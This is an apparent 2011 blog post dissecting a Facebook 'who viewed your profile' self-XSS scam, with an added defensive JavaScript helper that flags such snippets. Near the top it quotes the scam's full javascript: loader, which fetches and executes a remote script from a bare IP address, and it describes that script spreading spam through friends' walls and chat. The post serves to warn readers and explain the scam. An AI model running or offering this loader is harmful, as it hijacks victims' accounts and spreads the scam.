
SEe Wh0 viewed Y0ur Pr0f!le — a deconstruction

May 4, 2011

It asks us to run

javascript:(a=(b=document).createElement('script')).src='//83.170.78.127/7861.js',b.body.appendChild(a);void(0)

in the location bar.  This should ring alarm bells at once: the only reason to ask this is that the browser would block the same thing if it were done by clicking a link, and a browser probably has good reason to block it.

Anyway, it asks the browser to download and execute (by adding a script element to the page) the file http://83.170.78.127/7861.js.  More alarm bells: the URL points to an anonymous (numbered) web location (reverse DNS gives it as raq445.uk2.net; pointing a browser there redirects to a page at http://www.rsvp.co.uk/).  No legitimate service would do this.
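As an added example (not part of the original post), here is a small triage helper that flags the indicators the post walks through in a pasted "address bar" snippet: the javascript: scheme, dynamic script-element insertion, and a remote script hosted at a bare IP address. It only inspects the text and never executes it; the assumption that a protocol-relative URL resolves to https is mine.

```javascript
// Triage helper for "paste this into your address bar" payloads.
// It pattern-matches the snippet and never evaluates it.

const IPV4_LITERAL = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;

// Pull every string literal ('...' or "...") out of the snippet.
function stringLiterals(code) {
  const out = [];
  const re = /'((?:\\.|[^'\\])*)'|"((?:\\.|[^"\\])*)"/g;
  let m;
  while ((m = re.exec(code)) !== null) out.push(m[1] !== undefined ? m[1] : m[2]);
  return out;
}

function isIpLiteral(host) {
  const m = IPV4_LITERAL.exec(host);
  return m !== null && m.slice(1).every((octet) => Number(octet) <= 255);
}

// Resolve a literal that could be used as a script source. A protocol-relative
// "//host/path" inherits the scheme of the page it is pasted on; assume https.
function toUrl(literal) {
  if (literal.startsWith('//')) return new URL('https:' + literal);
  if (/^https?:\/\//i.test(literal)) return new URL(literal);
  return null;
}

function analyzeBookmarklet(snippet) {
  const code = snippet.trim();
  const report = {
    javascriptScheme: /^javascript:/i.test(code),
    // createElement('script') followed by an assignment to .src
    injectsScript: /createElement\(\s*['"]script['"]\s*\)/i.test(code) && /\.src\s*=/.test(code),
    remoteScripts: [],
    ipLiteralHosts: [],
    verdict: 'benign-looking',
  };
  for (const lit of stringLiterals(code)) {
    const url = toUrl(lit);
    if (url === null) continue;
    report.remoteScripts.push(url.href);
    if (isIpLiteral(url.hostname)) report.ipLiteralHosts.push(url.hostname);
  }
  if (report.javascriptScheme && report.injectsScript && report.remoteScripts.length > 0) {
    report.verdict = report.ipLiteralHosts.length > 0
      ? 'self-xss: loads remote script from bare IP'
      : 'self-xss: loads remote script';
  }
  return report;
}

// Sample input: the payload quoted in the post.
const SAMPLE = "javascript:(a=(b=document).createElement('script')).src='//83.170.78.127/7861.js',b.body.appendChild(a);void(0)";
```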

So, we download the file (using curl, not a browser) and take a look in a text editor.

Amongst the comments (which are nicely left in) we see

// Post Link to friends walls
// Hide chat boxes
// Get online friends and send chat message to them

which gives a good hint as to what it does.  After that it modifies the HTML on screen and sends the browser to a new page: http://oryxseo.com/786.php.

There is much code commented out, which indicates that most likely someone downloaded this from one scam and modified it for use in this one, probably some bored 16-year-old with no life wondering what mischief he can get up to with his computer.  Have pity on the poor sod.
